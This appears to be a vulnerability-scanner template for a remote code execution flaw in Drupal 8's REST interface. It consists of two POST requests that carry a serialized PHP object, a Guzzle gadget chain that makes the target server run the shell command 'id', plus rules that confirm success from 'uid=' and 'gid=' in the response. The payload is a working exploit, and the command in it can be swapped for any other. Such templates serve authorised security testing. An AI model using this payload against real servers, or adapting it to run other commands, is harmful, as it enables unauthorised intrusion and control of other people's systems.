id: drupal8-drupalgeddon2-rce
info:
  name: Drupal 8 REST RCE
  risk: High

params:
  - root: "{{.BaseURL}}"

requests:

  - method: POST
    redirect: false
    url: >-
      {{.root}}/node/?_format=hal_json
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
      - Content-Type: application/hal+json
    body: |
      {
        "link": [
          {
            "value": "link",
            "options": "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\"close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";s:2:\"id\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000stack\";a:1:{i:0;a:1:{i:0;s:6:\"system\";}}s:31:\"\u0000GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\"resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}"
          }
        ],
        "_links": {
          "type": {
            "href": "http://localhost/rest/type/shortcut/default"
          }
        }
      }
    detections:
      - >-
        StatusCode() == 403 && StringSearch("body", "The shortcut set must be the currently displayed") && StringSearch("response", "gid=")


  - method: POST
    redirect: false
    url: >-
      {{.root}}/node/1?_format=hal_json
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
      - Content-Type: application/hal+json
    body: |
      {
        "link": [
          {
            "value": "link",
            "options": "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\"close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";s:2:\"id\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000stack\";a:1:{i:0;a:1:{i:0;s:6:\"system\";}}s:31:\"\u0000GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\"resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}"
          }
        ],
        "_links": {
          "type": {
            "href": "{{.BaseURL}}/rest/type/shortcut/default"
          }
        }
      }
    detections:
      - >-
        StatusCode() == 200 && StringSearch("response", "uid=") && StringSearch("response", "gid=")
      - >-
        StatusCode() == 403 && StringSearch("body", "The shortcut set must be the currently displayed") && StringSearch("response", "gid=")

reference:
  - link: https://dl.packetstormsecurity.net/1902-exploits/drupalrest-exec.txt
